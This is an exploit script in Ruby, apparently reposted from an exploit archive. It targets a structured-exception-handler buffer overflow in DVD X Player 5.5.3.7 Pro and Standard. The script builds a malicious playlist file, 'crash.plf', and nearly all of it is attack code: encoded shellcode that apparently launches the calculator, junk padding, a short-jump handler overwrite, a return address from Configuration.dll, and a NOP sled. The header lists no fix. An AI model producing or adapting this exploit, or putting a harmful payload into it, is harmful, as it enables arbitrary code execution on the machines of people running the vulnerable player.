DVD X Player 5.5.37 Pro / Standard Buffer Overflow Vulnerability

#!/usr/bin/env ruby
# Exploit Title:DVD X Player 5.5.3.7 Pro & Standard (SEH) Buffer Overflow 
# Download link :http://www.aviosoft.com/dvd-player.html
# RST
# Author: metacom
# Date (found):03.05.2013
# Date (publish):03.05.2013
# version: 5.5.3.7 Pro & Standard
# Category: poc
# Tested on: windows 7 German 
# Notes: Last Update DVD X Player Jan 28, 2012 
# SOLUTION: None

calc =
"\xba\x38\xdc\x15\x77\xdd\xc7\xd9\x74\x24\xf4\x5d\x33\xc9" +
"\xb1\x33\x83\xc5\x04\x31\x55\x0e\x03\x6d\xd2\xf7\x82\x71" +
"\x02\x7e\x6c\x89\xd3\xe1\xe4\x6c\xe2\x33\x92\xe5\x57\x84" +
"\xd0\xab\x5b\x6f\xb4\x5f\xef\x1d\x11\x50\x58\xab\x47\x5f" +
"\x59\x1d\x48\x33\x99\x3f\x34\x49\xce\x9f\x05\x82\x03\xe1" +
"\x42\xfe\xec\xb3\x1b\x75\x5e\x24\x2f\xcb\x63\x45\xff\x40" +
"\xdb\x3d\x7a\x96\xa8\xf7\x85\xc6\x01\x83\xce\xfe\x2a\xcb" +
"\xee\xff\xff\x0f\xd2\xb6\x74\xfb\xa0\x49\x5d\x35\x48\x78" +
"\xa1\x9a\x77\xb5\x2c\xe2\xb0\x71\xcf\x91\xca\x82\x72\xa2" +
"\x08\xf9\xa8\x27\x8d\x59\x3a\x9f\x75\x58\xef\x46\xfd\x56" +
"\x44\x0c\x59\x7a\x5b\xc1\xd1\x86\xd0\xe4\x35\x0f\xa2\xc2" +
"\x91\x54\x70\x6a\x83\x30\xd7\x93\xd3\x9c\x88\x31\x9f\x0e" +
"\xdc\x40\xc2\x44\x23\xc0\x78\x21\x23\xda\x82\x01\x4c\xeb" +
"\x09\xce\x0b\xf4\xdb\xab\xe4\xbe\x46\x9d\x6c\x67\x13\x9c" +
"\xf0\x98\xc9\xe2\x0c\x1b\xf8\x9a\xea\x03\x89\x9f\xb7\x83" +
"\x61\xed\xa8\x61\x86\x42\xc8\xa3\xe5\x05\x5a\x2f\xc4\xa0" +
"\xda\xca\x18"

junk = "\x41" * 601 # Junk bytes

nseh = "\xEB\x06\x90\x90" # Short (6 bytes) jump!

seh  = "\xB8\x22\x30\x60"#0x603022B8   5E POP ESI from Configuration.dll

nops = "\x90" * 50

head = "http://"
data= head + junk + nseh + seh + nops + calc

File.open("crash.plf", 'w') do |b|  
  b.write data
  puts "file size : " + data.length.to_s
end

#  0day.today [2018-03-28]  #